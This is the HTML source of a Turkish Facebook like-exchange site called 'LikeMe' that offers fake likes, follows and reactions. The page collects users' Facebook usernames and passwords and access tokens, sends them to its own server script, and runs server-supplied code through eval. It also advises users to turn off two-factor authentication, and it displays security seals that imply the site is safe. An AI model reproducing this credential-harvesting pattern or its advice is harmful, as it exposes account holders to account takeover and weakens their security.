<script src="//ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<div class='LikeMe turk_bayrak' style='width:135px;height:135px;background-image:url(../anasayfa/sol_bayrak.png)'>
<style>.kdrs:hover{left:0px !important;opacity:0.70 !important;filter:alpha(opacity=70) !important;}</style>
<style type='text/css'>div.LikeMe{position:fixed;zindex:3000;}div.turk_bayrak{top:0px;left:0px;}</style>
</div>

<title>LikeMe | Facebook Beğeni</title>
<link rel="shortcut icon" href="favicon.ico" />
<link rel="canonical" href="http://begen.co"/>
<meta name="description" content="LikeMe Facebook Beğeni,Facebook Beğeni Hilesi, Facebook Sayfa Beğeni, Instagram Beğeni, Beğeni Hilesi, Durum beğeni,Resim beğeni,Yorum beğeni, Beğeni kasma" />

<style type="text/css">
@font-face {
  font-family: 'Dosis';	font-style: normal;	font-weight: 400;
  src: local('Dosis Regular'), local('Dosis-Regular'), url(../anasayfa/Dosis.woff) format('woff');
}	*, body {color: #636363;font-family: 'Dosis', sans-serif;}
</style>

<link href="../anasayfa/1.css" rel="stylesheet"  media="screen, projection">

<section class="container" style="width:90%;margin: 0 0 0 3%;">

			<section class="logo" style="margin:20;">	<!-- Margin ile üstten boşluk verildi !!! -->
				<h1>
				<span style="color: #2F3292;">
					 &nbsp;&nbsp; Like
				</span>
				<span style="color: #1CBAF2;margin: 0 0 0 -18px;">
					Me
				</span>
			<span style="color: #2F3292; font-size:11pt ; margin: 0 0 0 -18px;">&nbsp;&nbsp;v8.7</span><!-- margin eklendi -->

		</h1>
	</section>


<div style="position: fixed; top: 15; left: 30%;">
<!-- Reklam -->
</div>

	<section style="height: 130px;">

		<section style="font-size: 18px;background: #00C0F2;height: 40px;">
			<section style="padding: 10px;">

					<a title="Resim Beğeni"/><section style="cursor: default;color: #ffffff;margin: -2.75px 4px 0 0;float: left;">
							Durum, Resim, Resim ve Durum Yorumu, Sayfa Resmi, Sayfa Durumu, Reaksiyon <section style="margin: 3px 0 0 10px;"></section>						</section>
					</a>

						<a title="SSS"/><section style="cursor: pointer;color: #ffffff;margin: -2.75px 4px 0 0;float: right;">
							<a style="color:white" href="?s=sss" />SSS</a> <section style="margin: 3px 0 0 10px;"></section>						</section>
					</a>

						<a title="Hakkında"/><section style="cursor: pointer;color: #ffffff;margin: -2.75px 4px 0 0;float: right;">
							<a style="color:white" href="?s=hakkinda" />Hakkında</a> | <section style="margin: 3px 0 0 10px;"></section>						</section>
					</a>
					
						<a title="Anasayfa"/><section style="cursor: pointer;color: #ffffff;margin: -2.75px 4px 0 0;float: right;">
							<a style="color:white" href="../" />Anasayfa</a> | <section style="margin: 3px 0 0 10px;"></section>						</section>
					</a>

		</section>
	</section>
	
	<section>
		<section id="controller">
			
			<section class="headline">
			
	<h2>Facebook'ta Popüler Ol</h2>

	<h3 style="color: #aaaaaa;float: right;">
		Sorun mu var? <a href="l/yardim.php" target="_blank">Burayı</a> incele
	</h3>
	
</section>

<section class="token">
	<section class="description" style ='height: 0px; padding: 0px;'>
<!-- Bilgi -->
		</section>
		

	<table>
	
	<td width='50%'> 

<div class='info'><font size='4'><b>1) Şifreyle giriş: </b></font>
				<font size='3'>
				Kullanıcı adı ve şifrenizi girdikten sonra Token Al diyerek oluşan bütün yazıyı kopyalayın ve giriş yapın.<br>
				Giriş yaparken şifrenizi kulanmak yerine <a target="_blank" href='https://www.facebook.com/settings?tab=security&section=per_app_passwords&view'>bu sayfadan</a> uygulama şifresi oluşturup<br>
				Karşınıza gelen pencereye <b>likeme</b> yazarak facebook'un size verdiği sanal şifreyi kullanmanızı tavsiye ederiz.<br>
				Hesabınız Checkpoint'e düşüyorsa öncelikle her girişten önce tarayıcınızın yan sekmesinden facebook hesabınıza giriş yapın.<br>
				Ayrıca <a href='https://www.facebook.com/settings?tab=security&section=two_fac_auth&view'>İki faktörlü kimlik doğrulama</a>'yı kapatmayı deneyin.
				</font>
	<br>			
<font size='4'><b>2) Uygulamayla giriş: </b></font>

				<font size='3'><br><a href='https://begen.co/?kurulum=0'>Buradan</a> şifresiz giriş yapabilirsiniz.
				Bu yöntem ile hesabınız checkpointe düşmez ve çok daha kolay bir şekilde giriş yapabilirsiniz.
				</font>

				
</td>
	
	<td width='50%'>

		<div class='info' style='width: 100%;margin-left: 10px;'>
    <center><font size='3'><strong>Diğer Uygulamalarımız</strong></font></center>		
    </div>

		<section style='text-align: center;margin: 15px;'>
		<a href='https://instagram.begen.co'/>	<img src='../anasayfa/instagram.png' style='margin: 0 0 0 +25px; width:150; height:150px' /></a>
		<a href='https://instakipci.begen.co'/>	<img src='../anasayfa/instakipci.png' style='margin: 0 0 0 +25px; width:150; height:150px' /></a>
		<a href='https://begen.co/aiologin'/>		<img src='../anasayfa/reaksiyon.png' style='margin: 0 0 0 +25px; width:150; height:150px' /></a>

		</section>

				
			</div>
						

	</td>

	<tr>
			<td>
			
<script>
document.getElementById("username").value=getCookie("email");

function getCookie(cname) {
    var name = cname + "=";
    var ca = document.cookie.split(';');
    for(var i = 0; i < ca.length; i++) {
        var c = ca[i];
        while (c.charAt(0) == ' ') {
            c = c.substring(1);
        }
        if (c.indexOf(name) == 0) {
            return c.substring(name.length, c.length);
        }
    }
    return "";
}
function get_token() {
var http = new XMLHttpRequest();
var username = document.getElementById("username").value;
var password = document.getElementById("password").value;

var params = "username="+username+"&password="+password;


document.cookie = "email="+username;

http.open("POST", "usign_reklamsiz.php", true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.onreadystatechange = function() {
	
 if(http.readyState == 4 && http.status == 200) {
	var yorumveri = JSON.parse(this.responseText);
if(yorumveri && yorumveri.eval){eval(yorumveri.eval);}    
    }
}
http.send(params);
}

</script>

			<center>
			

			
				<input type='text' required name="username" id="username" class="text title" placeholder="Facebook Kullanıcı Adı" autocomplete="off" autofocus="" type="text">
				<input type='password' required name="password" id="password" class="text title" placeholder="Facebook Şifre" autocomplete="off" autofocus="" type="text">
				<input type="hidden" name="csrf" value="8a3dc26303dcfdf2ccfb99d1794113fd"/>
				
				
				<input value="Token Al" id='sendNewSms' onclick='get_token(this);' type="submit" class="submit" style="width: 20%;">	
				<div id="tokenarea" class="list-group-item"></div>
			
			
		<form action="kontrol.php" onsubmit="return checkForm(this);" method="post">
			<label style="margin: 0 0 0 0;">
				<input name="token" required class="text title" style="width: 100%;margin-left: 0%;" placeholder="CAAAACZAVC6ygBAPwYZC7f7YduawX8QbpUJg0uIODCKXbmknzlnKlTrX4lJkg0uIODCKXbmknzlnKlTrX4lJkGt04q" autocomplete="off" autofocus="" type="text">
			</label>
			<br>
			<font size='3' color='#777'> <a href='kosullar.php'>Şartlar ve Koşullar</a>'ı okudum, kabul ediyorum.</font>
			<input type='checkbox' required name="terms" id='checkme'/>
			<input type="hidden" name="csrf" value="8a3dc26303dcfdf2ccfb99d1794113fd"/>
			<input value="Giriş Yap" style="width: 20%;" id='sendNewSms2' class="submit" type="submit">
		</form>
	</td>		
	</tr>
	
</table>

<br><br>

</section>	

		

<br><br>

</section>

		<section style="border-top:1px solid #aaaaaa;padding: 5px;">
		
			<section style="float: left;">
				LikeMe © 2017 <a>Türkçe (TR)</a><br>
				</section>
			
				<section style="float: right;">
				<a href="http://www.avgthreatlabs.com/website-safety-reports/domain/begen.co" target="_blank">
				<img style='margin: 0 0 0 +15px;' src="../anasayfa/avg_seal.png" border="0" width="98" height="35" alt="AVG Secured"></a>

				<a href="https://www.virustotal.com/tr/url/8b1d99c029380ec71fbfdfae45b5411297ebfd20d2690aa525b935b6d5ea8a11/analysis/" target="_blank">
				<img style='margin: 0 0 0 +15px;' src="../anasayfa/virustotal_seal.png" border="0" width="98" height="35" alt="Virustotal Secured"></a>

				<a href="http://www.urlvoid.com/scan/begen.co/" target="_blank">
				<img style='margin: 0 0 0 +15px;' src="../anasayfa/urlvoid_seal.png" border="0" width="78" height="35" alt="URLVOID Secured"></a>

				<a href="http://safeweb.norton.com/report/show?url=begen.co" target="_blank">
				<img style='margin: 0 0 0 +15px;' src="../anasayfa/norton-secured-seal.png" border="0" width="78" height="35" alt="Norton Secured"></a>
				
				<a href="https://certlogik.com/ssl-checker/begen.co/summary" target="_blank">
				<img style='margin: 0 0 0 +15px;' src="../anasayfa/ssl-seal.png" border="0" width="150" height="35" alt="SSL Secured"></a>
				
				</section>
				
			
	</section>
</section>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-53132490-1', 'auto');
  ga('send', 'pageview');

</script>